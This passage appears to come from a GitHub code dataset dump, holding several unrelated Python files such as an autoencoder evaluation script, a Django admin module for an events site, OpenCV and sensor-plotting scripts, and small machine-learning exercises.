Data.DataLoader(dataset=torch_Kobs, batch_size=BATCH_SIZE2, shuffle=False)\r\n\r\nlayer_index=[2,3]\r\nmaxerror=[]\r\nmeanerror=[]\r\nsims=[]\r\nfor step,layer in 
enumerate(layer_index):\r\n ae_test=autoencoder(input_num,layer,batch_normalization=True)\r\n namestr = 'ae_withBN_' + '%d' % layer + '.pkl'#神经网络命名规则:withBN代表包含BN层,_layer代表网络层数\r\n ae_test = torch.load(namestr)#加载神经网络\r\n test_Kobs=np.zeros((1,14))\r\n ae_test.eval()#测试状态\r\n for step,s in enumerate(test_loader):\r\n test_enc,test_dec=ae_test(s)\r\n #反归一化\r\n np_dec=test_dec.data.numpy()\r\n np_dec=np_dec*(np_Dmax-np_Dmin)+np_Dmin\r\n test_Kobs=np.vstack((test_Kobs,np_dec))\r\n test_Kobs=np.delete(test_Kobs,0,axis=0)\r\n np_Kobs = np_Kobs * (np_Dmax - np_Dmin) + np_Dmin#反归一化\r\n #各变量图片\r\n plt.rcParams['font.sans-serif']=['SimHei']#图片显示中文\r\n plt.rcParams['axes.unicode_minus'] = False\r\n label=['风粉混合物温度/℃','反作用力加载油压/MPa',\r\n '加载油压/MPa','磨煤机电流/A','一次风压力/kPa','密封风母管压力/kPa','一次风与密封风差压/kPa',\r\n '出入口差压/kPa','油箱油温/℃','一次风流量/t·h-1','轴承温度/℃','推力瓦温/℃','油池油温/℃','实际功率/MW']\r\n e=np.ones((Kobs_num,14))\r\n maxe=np.ones((1,14))\r\n meane=np.ones((1,14))\r\n for j in range(14):\r\n plt.subplot(211)\r\n plt.gca().yaxis.set_major_formatter(ticker.FormatStrFormatter('%.1f'))\r\n plt.plot(np_Kobs[:, j],'steelblue',label='观测值',lw=1.5)\r\n plt.plot(test_Kobs[:, j],'indianred',label='重构值',lw=1.5)\r\n plt.legend(loc='upper right',fontsize=13)\r\n plt.xlabel('样本序号',fontsize=20)\r\n plt.ylabel(label[j],fontsize=20,verticalalignment='bottom')\r\n plt.xticks(fontsize=20)\r\n plt.yticks(fontsize=20)\r\n plt.subplot(212)\r\n plt.gca().yaxis.set_major_formatter(ticker.FormatStrFormatter('%.1f'))\r\n e[:,j]=((np_Kobs[:, j] - test_Kobs[:, j]) / np_Kobs[:, j])*100\r\n maxe[:,j]=np.max(abs(e[:,j]))\r\n meane[:,j] = np.mean(abs(e[:, j]))\r\n plt.plot(e[:,j],'peru',lw=1)#偏离度\r\n plt.xlabel('样本序号', fontsize=20)\r\n plt.ylabel('相对误差/%',fontsize=20)\r\n plt.xticks(fontsize=20)\r\n plt.yticks(fontsize=18)\r\n plt.show()\r\n np.set_printoptions(formatter={'float': '{: 0.4f}'.format})\r\n maxerror.append(maxe)\r\n meanerror.append(meane)\r\n #观测值与估计值的欧式距离\r\n np_Kobs = (np_Kobs - np_Dmin) / (np_Dmax - np_Dmin)\r\n test_Kobs = (test_Kobs - np_Dmin) / (np_Dmax - np_Dmin)\r\n dist_norm=[]\r\n for i in range(Kobs_num):\r\n dist_norm.append(np.linalg.norm( np_Kobs[i,:] - test_Kobs[i,:] ))\r\n dist_norm_arr=np.array(dist_norm,dtype=float)#欧式距离\r\n #观测值与估计值的余弦距离\r\n dist_cos=[]\r\n for i in range(Kobs_num):\r\n dist_cos.append(np.dot(np_Kobs[i, :], test_Kobs[i, :]) /\r\n (np.linalg.norm(np_Kobs[i, :]) * np.linalg.norm(\r\n test_Kobs[i, :] )))#dot向量内积,norm向量二范数\r\n dist_cos_arr=(np.array(dist_cos, dtype=float) * 0.5 + 0.5)#余弦距离\r\n #阈值\r\n sim=(1/(1+dist_norm_arr/dist_cos_arr))#相似度\r\n sims.append(sim)\r\n # threshold=np.min(sim)*0.98 #验证时注释\r\n # print('threshold=',threshold)\r\n\r\n#将不同层数的神经网络模型的估计效果在同一个图中展示:\r\nfor step,layer in enumerate(layer_index):\r\n plt.plot(maxerror[step].reshape((14,)),lw=0.8,label='ae_withBN_' + '%d' % layer)\r\nplt.legend(loc='upper left', fontsize=12)\r\nplt.xlabel('变量序号', fontsize=18)\r\nplt.ylabel('最大相对误差', fontsize=18)\r\nplt.show()\r\nfor step,layer in enumerate(layer_index):\r\n plt.plot(meanerror[step].reshape((14,)),lw=0.8,label='ae_withBN_' + '%d' % layer)\r\nplt.legend(loc='upper left', fontsize=12)\r\nplt.xlabel('变量序号', fontsize=18)\r\nplt.ylabel('平均相对误差', fontsize=18)\r\nplt.show()\r\nfor step,layer in enumerate(layer_index):\r\n plt.plot(sims[step].reshape((Kobs_num,)), lw=0.8, label='ae_withBN_' + '%d' % layer)\r\nplt.legend(loc='lower left', fontsize=12)\r\nplt.xlabel('样本序号',fontsize=18)\r\nplt.ylabel('相似度',fontsize=18)\r\nplt.ylim((0, 
1))\r\nplt.show()","repo_name":"xiaobinbin0827/SAE_pytorch","sub_path":"AE_Test.py","file_name":"AE_Test.py","file_ext":"py","file_size_in_byte":5075,"program_lang":"python","lang":"zh","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"3345592314","text":"from butler_offline.viewcore import viewcore\nfrom butler_offline.viewcore.viewcore import post_action_is\nfrom butler_offline.viewcore.converter import from_double_to_german, datum, datum_to_string, datum_to_german\nfrom butler_offline.viewcore import request_handler\nfrom butler_offline.viewcore.state import non_persisted_state\nfrom butler_offline.viewcore.context.builder import generate_transactional_page_context\nfrom butler_offline.viewcore.template import fa\nfrom butler_offline.core.database.gemeinsamebuchungen import Gemeinsamebuchungen\nfrom typing import List\nimport logging\n\n\nclass AddGemeinsameBuchungContext:\n def __init__(self,\n gemeinsame_buchungen: Gemeinsamebuchungen,\n partner_name: str,\n database_name: str,\n kategorien: List[str]):\n self._gemeinsame_buchungen = gemeinsame_buchungen\n self._partner_name = partner_name\n self._database_name = database_name\n self._kategorien = kategorien\n\n def gemeinsame_buchungen(self) -> Gemeinsamebuchungen:\n return self._gemeinsame_buchungen\n\n def partner_name(self) -> str:\n return self._partner_name\n\n def kategorien(self) -> List[str]:\n return self._kategorien\n\n def database_name(self) -> str:\n return self._database_name\n\n\ndef handle_request(request, context: AddGemeinsameBuchungContext):\n if post_action_is(request, 'add'):\n date = datum(request.values['date'])\n value = request.values['wert'].replace(\",\", \".\")\n value = float(value)\n value = value * -1\n if \"edit_index\" in request.values:\n context.gemeinsame_buchungen().edit(int(request.values['edit_index']),\n datum=date,\n name=str(request.values['name']),\n kategorie=request.values['kategorie'],\n wert=value,\n person=request.values['person']\n )\n non_persisted_state.add_changed_gemeinsamebuchungen(\n {\n 'fa': fa.pencil,\n 'datum': datum_to_german(date),\n 'kategorie': request.values['kategorie'],\n 'name': request.values['name'],\n 'wert': from_double_to_german(value),\n 'person': request.values['person']\n })\n\n else:\n context.gemeinsame_buchungen().add(ausgaben_datum=date,\n kategorie=request.values['kategorie'],\n ausgaben_name=request.values['name'],\n wert=\"%.2f\" % value,\n person=request.values['person'])\n non_persisted_state.add_changed_gemeinsamebuchungen(\n {\n 'fa': fa.plus,\n 'datum': datum_to_german(date),\n 'kategorie': request.values['kategorie'],\n 'name': request.values['name'],\n 'wert': from_double_to_german(value),\n 'person': request.values['person']\n })\n\n result_context = generate_transactional_page_context(\"addgemeinsam\")\n result_context.add('approve_title', 'Gemeinsame Ausgabe hinzufügen')\n if post_action_is(request, 'edit'):\n logging.info('Please edit: %s', request.values['edit_index'])\n db_index = int(request.values['edit_index'])\n db_row = context.gemeinsame_buchungen().get(db_index)\n default_item = {\n 'edit_index': str(db_index),\n 'datum': datum_to_string(db_row['Datum']),\n 'name': db_row['Name'],\n 'wert': from_double_to_german(db_row['Wert'] * -1),\n 'kategorie': db_row['Kategorie'],\n 'person': db_row['Person']\n }\n\n result_context.add('default_item', default_item)\n result_context.add('bearbeitungsmodus', True)\n result_context.add('edit_index', db_index)\n result_context.add('approve_title', 'Gemeinsame Ausgabe 
aktualisieren')\n\n if not result_context.contains('default_item'):\n result_context.add('default_item', {\n 'name': '',\n 'wert': '',\n 'datum': ''\n })\n\n result_context.add('personen', [context.database_name(), context.partner_name()])\n result_context.add('kategorien', sorted(context.kategorien()))\n result_context.add('letzte_erfassung', reversed(non_persisted_state.get_changed_gemeinsamebuchungen()))\n return result_context\n\n\ndef index(request):\n return request_handler.handle(\n request=request,\n handle_function=handle_request,\n html_base_page='gemeinsame_buchungen/addgemeinsam.html',\n context_creator=lambda db: AddGemeinsameBuchungContext(\n gemeinsame_buchungen=db.gemeinsamebuchungen,\n database_name=db.name,\n kategorien=db.einzelbuchungen.get_kategorien_ausgaben(hide_ausgeschlossene_kategorien=True),\n partner_name=viewcore.name_of_partner()\n )\n )\n","repo_name":"SebastianRzk/BudgetButlerWeb","sub_path":"butler_offline/views/gemeinsame_buchungen/addgemeinsam.py","file_name":"addgemeinsam.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"30649345110","text":"from nltk.metrics import *\n\n\ndef withMinEditDist(word, list):\n if len(list) >0:\n suitableWord = list[0]\n\n for item in list:\n if edit_distance(word, suitableWord) > edit_distance(word, item):\n suitableWord = item\n return suitableWord\n else:\n return word\n\n\n\nprint(withMinEditDist('r00m', ['room', 'booking', 'hotel', 'customer']))\n\n\n","repo_name":"amilacjay/isyntax","sub_path":"sketchquery/test/nltk/minEditDist.py","file_name":"minEditDist.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16818739700","text":"from datetime import datetime\n\nfrom django.contrib import admin, messages\nfrom django import forms\nfrom django.forms import ModelForm\nfrom django.contrib.auth import admin as auth_admin\nfrom django.contrib.flatpages.models import FlatPage\nfrom django.contrib.flatpages.admin import FlatPageAdmin, FlatpageForm\nfrom django.utils.safestring import mark_safe\nfrom django.conf.urls import url\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\n\nfrom codemirror import CodeMirrorTextarea\nfrom suit.admin import SortableModelAdmin\n\nfrom .forms import (\n UserChangeForm, UserCreationForm, UserLimitedChangeForm, AddOrganizerForm\n)\nfrom .filters import OpenRegistrationFilter\nfrom .models import (\n Coach, Event, User, EventPage, EventPageContent, EventPageMenu, Postmortem,\n Sponsor, Story\n)\n\n\nclass EventAdmin(admin.ModelAdmin):\n list_display = ('name', 'organizers', 'email', 'date', 'city', 'country',\n 'is_on_homepage', 'is_past_event', 'has_stats')\n list_filter = (OpenRegistrationFilter,)\n search_fields = ('city', 'country', 'name')\n filter_horizontal = ['team']\n\n def get_queryset(self, request):\n qs = super(EventAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(team=request.user)\n\n def is_past_event(self, obj):\n return not obj.is_upcoming()\n is_past_event.boolean = True\n\n def has_stats(self, obj):\n return Postmortem.objects.filter(event=obj).exists()\n has_stats.boolean = True\n\n def get_readonly_fields(self, request, obj=None):\n if obj and not request.user.is_superuser:\n return ('email', 'team', 'is_deleted', 'is_on_homepage')\n 
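        # superusers fall through to the unrestricted default readonly_fields\n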
return self.readonly_fields\n\n def get_urls(self):\n urls = super(EventAdmin, self).get_urls()\n my_urls = [\n url(r'manage_organizers/$',\n self.admin_site.admin_view(self.view_manage_organizers),\n name='core_event_manage_organizers'),\n url(r'add_organizers/$',\n self.admin_site.admin_view(self.view_add_organizers),\n name='core_event_add_organizers'),\n ]\n return my_urls + urls\n\n def _get_future_events_for_user(self, request):\n \"\"\"\n Retrieves a list of future events, ordered by name.\n It's based on get_queryset, so superuser see all events, while\n is_staff users see events they're assigned to only.\n \"\"\"\n return self.get_queryset(request) \\\n .filter(date__gte=datetime.now()\n .strftime(\"%Y-%m-%d\")).order_by('name')\n\n def _get_event_from_get(self, request, all_events):\n \"\"\"\n Retrieves a particular event from request.GET['event_id'], or\n returns the first one from all events available to the user.\n \"\"\"\n if 'event_id' in request.GET:\n try:\n return all_events.get(id=request.GET['event_id'])\n except Event.DoesNotExist:\n pass\n else:\n return all_events.first()\n\n def view_manage_organizers(self, request):\n \"\"\"\n Custom admin view that allows user to remove organizers from an event\n \"\"\"\n all_events = self._get_future_events_for_user(request)\n event = self._get_event_from_get(request, all_events)\n\n if 'remove' in request.GET and event in all_events:\n user = User.objects.get(id=request.GET['remove'])\n if user == request.user:\n messages.error(request, 'You cannot remove yourself from a team.')\n else:\n if user in event.team.all():\n event.team.remove(user)\n messages.success(request, 'Organizer {} has been removed'.format(user.get_full_name()))\n return HttpResponseRedirect(\n reverse('admin:core_event_manage_organizers') + '?event_id={}'.format(event.id))\n\n return render(request, 'admin/core/event/view_manage_organizers.html', {\n 'all_events': all_events,\n 'event': event,\n 'title': 'Remove organizers',\n })\n\n def view_add_organizers(self, request):\n \"\"\"\n Custom admin view that allows user to add new organizer to an event\n \"\"\"\n all_events = self._get_future_events_for_user(request)\n event = self._get_event_from_get(request, all_events)\n\n if request.method == 'POST':\n form = AddOrganizerForm(all_events, request.POST)\n if form.is_valid():\n user = form.save()\n messages.success(request,\n \"{} has been added to your event, yay! 
They've been also\" \\\n \" invited to Slack and should receive credentials to login\" \\\n \" in an e-mail.\".format(user.get_full_name()))\n return redirect('admin:core_event_add_organizers')\n else:\n form = AddOrganizerForm(all_events)\n\n return render(request, 'admin/core/event/view_add_organizers.html', {\n 'all_events': all_events,\n 'event': event,\n 'form': form,\n 'title': 'Add organizers',\n })\n\n\nclass EventPageAdmin(admin.ModelAdmin):\n list_display = ('title', 'event', 'is_live')\n search_fields = ('title', 'event__name', 'event__city', 'event__country')\n\n def get_queryset(self, request):\n qs = super(EventPageAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(event__team=request.user)\n\n def get_readonly_fields(self, request, obj=None):\n if obj and not request.user.is_superuser:\n # Don't let change objects for events that already happened\n if not obj.event.is_upcoming():\n return set([x.name for x in self.model._meta.fields])\n else:\n return ('url', 'is_deleted')\n return self.readonly_fields\n\n\nclass ResizableCodeMirror(CodeMirrorTextarea):\n\n def __init__(self, **kwargs):\n super(ResizableCodeMirror, self).__init__(\n js_var_format='%s_editor', **kwargs)\n\n @property\n def media(self):\n mine = forms.Media(\n css={'all': ('vendor/jquery-ui/jquery-ui.min.css',)},\n js=('vendor/jquery-ui/jquery-ui.min.js',))\n return super(ResizableCodeMirror, self).media + mine\n\n def render(self, name, value, attrs=None):\n output = super(ResizableCodeMirror, self).render(name, value, attrs)\n return output + mark_safe(\n '''\n \n ''' % name)\n\n\nclass EventPageContentForm(ModelForm):\n\n class Meta:\n widgets = {\n 'content': ResizableCodeMirror(mode=\"xml\")\n }\n fields = (\n 'page',\n 'name',\n 'content',\n 'background',\n 'position',\n 'is_public',\n )\n\n\nclass SponsorInline(admin.TabularInline):\n model = EventPageContent.sponsors.through\n extra = 1\n verbose_name_plural = 'Sponsors'\n\n\nclass CoachInline(admin.TabularInline):\n model = EventPageContent.coaches.through\n extra = 1\n verbose_name_plural = 'Coaches'\n\n\nclass EventPageContentAdmin(SortableModelAdmin):\n list_display = ('name', 'page', 'position', 'is_public')\n list_filter = ('page', 'is_public')\n search_fields = ('name', 'page__title', 'content', 'page__event__city',\n 'page__event__country', 'page__event__name')\n form = EventPageContentForm\n sortable = 'position'\n inlines = [\n SponsorInline,\n CoachInline\n ]\n\n def get_queryset(self, request):\n qs = super(EventPageContentAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(page__event__team=request.user)\n\n def get_form(self, request, obj=None, **kwargs):\n form = super(EventPageContentAdmin, self).get_form(\n request, obj, **kwargs)\n if not request.user.is_superuser:\n if 'page' in form.base_fields:\n form.base_fields['page'].queryset = EventPage.objects.filter(\n event__team=request.user\n )\n return form\n\n def get_readonly_fields(self, request, obj=None):\n if obj and not request.user.is_superuser:\n # Don't let change objects for events that already happened\n if not obj.page.event.is_upcoming():\n return set([x.name for x in self.model._meta.fields])\n return self.readonly_fields\n\n\nclass EventPageMenuAdmin(SortableModelAdmin):\n list_display = ('title', 'page', 'url', 'position')\n list_filter = ('page',)\n sortable = 'position'\n\n def get_queryset(self, request):\n qs = super(EventPageMenuAdmin, self).get_queryset(request)\n if 
request.user.is_superuser:\n return qs\n return qs.filter(page__event__team=request.user)\n\n def get_form(self, request, obj=None, **kwargs):\n form = super(EventPageMenuAdmin, self).get_form(request, obj, **kwargs)\n if not request.user.is_superuser:\n if 'page' in form.base_fields:\n form.base_fields['page'].queryset = EventPage.objects.filter(\n event__team=request.user\n )\n return form\n\n def get_readonly_fields(self, request, obj=None):\n if obj and not request.user.is_superuser:\n # Don't let change objects for events that already happened\n if not obj.page.event.is_upcoming():\n return set([x.name for x in self.model._meta.fields])\n return self.readonly_fields\n\n\nclass SponsorAdmin(admin.ModelAdmin):\n list_display = ('id', 'name', 'logo_display_for_admin', 'url')\n list_per_page = 50\n search_fields = ('name', )\n\n def get_queryset(self, request):\n qs = super(SponsorAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(eventpagecontent__page__event__team=request.user).distinct()\n\n def get_form(self, request, obj=None, **kwargs):\n form = super(SponsorAdmin, self).get_form(request, obj, **kwargs)\n if not request.user.is_superuser:\n if 'eventpagecontent' in form.base_fields:\n qs = EventPageContent.objects.filter(\n page__event__team=request.user)\n form.base_fields['eventpagecontent'].queryset = qs\n return form\n\n\nclass CoachAdmin(admin.ModelAdmin):\n list_display = ('name', 'photo_display_for_admin', 'twitter_handle', 'url')\n search_fields = ('name', 'twitter_handle', 'url')\n\n def get_queryset(self, request):\n qs = super(CoachAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(eventpagecontent__page__event__team=request.user).distinct()\n\n def get_form(self, request, obj=None, **kwargs):\n form = super(CoachAdmin, self).get_form(request, obj, **kwargs)\n if not request.user.is_superuser:\n if 'eventpagecontent' in form.base_fields:\n qs = EventPageContent.objects.filter(\n page__event__team=request.user)\n form.base_fields['eventpagecontent'].queryset = qs\n return form\n\n\nclass PostmortemAdmin(admin.ModelAdmin):\n list_display = ('event', 'attendees_count', 'applicants_count')\n raw_id_fields = ('event',)\n\n def get_changeform_initial_data(self, request):\n initial = super(PostmortemAdmin,\n self).get_changeform_initial_data(request)\n if \"event\" in request.GET:\n event = Event.objects.get(pk=request.GET['event'])\n initial['event'] = event\n return initial\n\n\nclass UserAdmin(auth_admin.UserAdmin):\n fieldsets = (\n (None, {'fields': ('email', 'password')}),\n ('Personal info', {'fields': ('first_name', 'last_name')}),\n ('Permissions', {'fields': ('is_active', 'is_staff', 'is_superuser',\n 'groups', 'user_permissions')}),\n ('Important dates', {'fields': ('last_login', 'date_joined')}),\n )\n limited_fieldsets = (\n (None, {'fields': ('email',)}),\n ('Personal info', {'fields': ('first_name', 'last_name')}),\n ('Important dates', {'fields': ('last_login', 'date_joined')}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('email', 'password1', 'password2')\n }),\n )\n form = UserChangeForm\n limited_form = UserLimitedChangeForm\n add_form = UserCreationForm\n change_password_form = auth_admin.AdminPasswordChangeForm\n list_display = ('email', 'first_name', 'last_name', 'is_superuser', 'date_joined')\n list_filter = ('event', 'is_staff', 'is_superuser', 'is_active', 'groups', 'date_joined')\n search_fields = ('first_name', 'last_name', 
'email')\n ordering = ('email',)\n readonly_fields = ('last_login', 'date_joined',)\n\n def get_queryset(self, request):\n qs = super(UserAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(pk=request.user.pk)\n\n def get_form(self, request, obj=None, **kwargs):\n defaults = {}\n if obj and not request.user.is_superuser:\n defaults.update({\n 'form': self.limited_form,\n 'fields': admin.util.flatten_fieldsets(self.limited_fieldsets),\n })\n defaults.update(kwargs)\n return super(UserAdmin, self).get_form(request, obj, **defaults)\n\n def get_fieldsets(self, request, obj=None):\n if obj and not request.user.is_superuser:\n return self.limited_fieldsets\n return super(UserAdmin, self).get_fieldsets(request, obj)\n\n\nclass StoryAdmin(admin.ModelAdmin):\n list_display = ('name', 'is_story', 'created')\n search_fields = ('name', 'content')\n list_filter = ('is_story',)\n\n\nclass MyFlatPageAdmin(FlatPageAdmin):\n\n class MyFlatpageForm(FlatpageForm):\n template_name = forms.CharField(\n initial='flatpage.html',\n help_text=\"Change this only if you know what you are doing\")\n\n form = MyFlatpageForm\n\nadmin.site.unregister(FlatPage)\nadmin.site.register(FlatPage, MyFlatPageAdmin)\nadmin.site.register(Event, EventAdmin)\nadmin.site.register(EventPage, EventPageAdmin)\nadmin.site.register(EventPageContent, EventPageContentAdmin)\nadmin.site.register(EventPageMenu, EventPageMenuAdmin)\nadmin.site.register(User, UserAdmin)\nadmin.site.register(Sponsor, SponsorAdmin)\nadmin.site.register(Postmortem, PostmortemAdmin)\nadmin.site.register(Coach, CoachAdmin)\nadmin.site.register(Story, StoryAdmin)\n","repo_name":"jxub/djangogirls","sub_path":"core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":15097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"34627968151","text":"class Solution:\n def isValidSerialization(self, preorder: str) -> bool:\n lst = preorder.split(\",\")\n deg = 1\n\n for idx, s in enumerate(lst):\n if deg == 0:\n return False\n deg += -1 if s == '#' else 1\n\n return deg == 0","repo_name":"zqy1018/my_leetcode","sub_path":"code/331.py","file_name":"331.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"61"} +{"seq_id":"6008105897","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\nclass MultiClassification(nn.Module):\n def __init__(self, layer_sizes, activation = 'relu'):\n super(MultiClassification, self).__init__()\n\n self.n_layers = len(layer_sizes) - 1\n\n self.layers = nn.ModuleList()\n for i in range(self.n_layers):\n self.layers.append(nn.Linear(layer_sizes[i], layer_sizes[i + 1]))\n\n self.activation = None\n if activation == 'relu':\n self.activation = F.relu\n elif activation == 'gelu':\n self.activation = F.gelu\n elif activation == 'elu':\n self.activation = F.elu\n else:\n raise Exception(\"Invalid activation function\")\n\n def forward(self, inputs):\n x = inputs\n\n for i in range(self.n_layers - 1):\n x = self.layers[i](x)\n x = self.activation(x)\n\n x = self.layers[self.n_layers - 1](x)\n\n return x","repo_name":"udellgroup/SketchySGD","sub_path":"deep_learning/models/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24549893918","text":"import numpy as np \nimport imutils\nimport cv2\nimport argparse\n\nap = 
argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required= True, help=\"path to image\")\n\n\nargs = vars(ap.parse_args())\n\nimage = cv2.imread(args[\"image\"])\ncv2.imshow(\"Original\", image)\n\n#this defines the height and width of image\n(h, w) = image.shape[:2]\n#this defines a center point\ncenter = (w / 2, h / 2)\n\n#this rotates our matrix by 45 degrees\nM = cv2.getRotationMatrix2D(center, 45, 5.0)\nrotated = cv2.warpAffine(image, M, (w, h))\ncv2.imshow(\"Rotated by 45 Degrees\", rotated)\ncv2.waitKey(0)\n\n\n#this rotates the image by 90 degrees\n\nM = cv2.getRotationMatrix2D(center, 90, 1.0)\nrotated = cv2.warpAffine(image, M, (w, h))\ncv2.imshow(\"Rotated by 90 degrees\", rotated)\ncv2.waitKey(0)\n\n\nrotated = imutils.rotate(image, 180)\ncv2.imshow(\"Rotated by 180 degrees\", rotated)\ncv2.waitKey(0)","repo_name":"jgerardsimcock/OpenCV_practice","sub_path":"scripts/rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23587250511","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 15 09:53:08 2017\n\n@author: marshi\n\"\"\"\n\ndef pp_small(ac,aj,c,d):\n if ac == 1 or aj == 1:\n return 2\n else:\n if c[0] > d[0]:\n c,d = d,c\n if (d[1] - c[0]) > 720 and (1440 - (d[0] - c[1]) > 720):\n return 4\n else:\n return 2\n\nif 0:\n ac,aj = 2,0\n c = [180, 540]\n d = [900, 1260]\n \n print(pp_small(ac,aj,c,d))\nelse:\n t = int(input())\n for i in range(t):\n ac,aj = map(int, input().split(' '))\n c = list(map(int, input().split(' ')))\n if ac+aj == 1:\n d = None\n else:\n d = list(map(int, input().split(' ')))\n print(\"Case #%d: %d\"%(i+1, pp_small(ac,aj,c,d)))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_210/138.py","file_name":"138.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73470249155","text":"# Import\nfrom DAH import DS18B20\nimport time\n \n#print(tmp0.getCelsius())\n \nimport pylab\nimport matplotlib.animation as animation\nimport datetime\n# Empty arrays of time and measurement values to plot\ntimeValues = [ ]\nmeasurements = [ ]\n# Set up the plot object\nplotFigure = pylab.figure()\ntmp0 = DS18B20( address=\"10-000803472a99\" )\n\nt_start = time.time()\n\n# The function to call each time the plot is updated\n\ndef updatePlot( i ):\n \n if i < 49:\n timeValues.append( datetime.datetime.now() ) # Store time\n measurements.append( tmp0.getCelsius() ) # Store temperature\n plotFigure.clear() # Clear the old plot\n pylab.plot( timeValues, measurements ) # Make the new plot\n pylab.xlabel(\"Time\")\n pylab.ylabel(\"Temperature\")\n pylab.title(\"Temperature of sensor against time\")\n \n# Make the animated plot\nani = animation.FuncAnimation( plotFigure, updatePlot, interval=1000 )\n\npylab.show()\n\n","repo_name":"faantoniadou/Data-Acquisition-Handling","sub_path":"checkpoint_5b.py","file_name":"checkpoint_5b.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12511075917","text":"# Calculate how many cans of paint we will need to paint a wall with x height and y width\nfrom math import ceil\n\n\ndef paint_calc(width, height, cover):\n cans = (width * height) / cover\n cans = ceil(cans)\n print(f\"You'll need {cans} cans of paint.\")\n\n\ntest_h = 
int(input(\"Height of wall: \"))\ntest_w = int(input(\"Width of wall: \"))\ncoverage = 5\npaint_calc(height=test_h, width=test_w, cover=coverage)\n","repo_name":"hristo2612/100-days-of-code-python","sub_path":"Day 8 - Function Parameters/8_2_Print_Area_Calculator.py","file_name":"8_2_Print_Area_Calculator.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74520579074","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import make_blobs\nfrom sklearn.metrics import accuracy_score\n\n\ndef initialisation(X):\n W = np.random.randn(X.shape[1], 1)\n b = np.random.randn(1)\n return (W, b)\n\n\ndef model(X, W, b):\n Z = X.dot(W) + b\n A = 1 / (1 + np.exp(-Z))\n return A\n\n\ndef log_loss(A, y):\n return 1 / len(y) * np.sum(-y * np.log(A) - (1 - y) * np.log(1 - A))\n\n\ndef gradients(A, X, y):\n dW = 1 / len(y) * np.dot(X.T, A - y)\n db = 1 / len(y) * np.sum(A - y)\n return (dW, db)\n\n\ndef update(dW, db, W, b, learning_rate):\n W = W - learning_rate * dW\n b = b - learning_rate * db\n return (W, b)\n\n\ndef predict(X, W, b):\n A = model(X, W, b)\n # print(A)\n return A >= 0.5\n\n\ndef artificial_neuron(X, y, learning_rate=0.1, n_iter=100):\n # initialisation W, b\n W, b = initialisation(X)\n\n Loss = []\n\n for i in range(n_iter):\n A = model(X, W, b)\n Loss.append(log_loss(A, y))\n dW, db = gradients(A, X, y)\n W, b = update(dW, db, W, b, learning_rate)\n\n y_pred = predict(X, W, b)\n print(accuracy_score(y, y_pred))\n plt.figure(\"Loss\", figsize=(14, 14))\n plt.title('Loss')\n plt.plot(Loss)\n\n return (W, b)\n","repo_name":"hichemseriket/monReseauDeNeuronnes","sub_path":"git/newTestIpynb.py","file_name":"newTestIpynb.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17289158827","text":"import time\nimport numpy as np\n#from matplotlib import pyplot as plt\nfrom keras.utils import np_utils\nimport keras.callbacks as cb\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.optimizers import Adam\nfrom keras.datasets import mnist\nimport sys\nfrom optparse import OptionParser\nfrom sklearn.preprocessing import StandardScaler\nimport keras.callbacks as cb\nimport random\n\nif __name__ == \"__main__\":\n\n sdmsingletop = np.genfromtxt('data/dmsingleptop100.txt', delimiter=',')\n sttbar = np.genfromtxt('data/ttbar.txt', delimiter=',')\n sdmttbar = np.genfromtxt('data/ttbardmscalar100.txt', delimiter=',')\n\n #Randomize the events\n np.random.shuffle(sdmsingletop)\n np.random.shuffle(sttbar)\n np.random.shuffle(sdmttbar)\n \n N = 13000\n\n ttbar = sttbar[0:N, :]\n dmttbar = sdmttbar[0:N, :]\n dmsingletop = sdmsingletop[0:N, :]\n\n zeros = np.zeros((np.shape(ttbar)[0], 1))\n ones = np.zeros((np.shape(dmttbar)[0], 1)) + 1\n twos = np.zeros((np.shape(dmsingletop)[0], 1)) + 2\n\n features_ = np.concatenate((ttbar, dmttbar, dmsingletop)) \n categories_ = np.concatenate((zeros, ones, twos))\n\n #Let's mix signal and background together to avoid issues\n mix = list(zip(features_, categories_))\n random.shuffle(mix)\n features_, categories_ = zip(*mix)\n\n scaler = 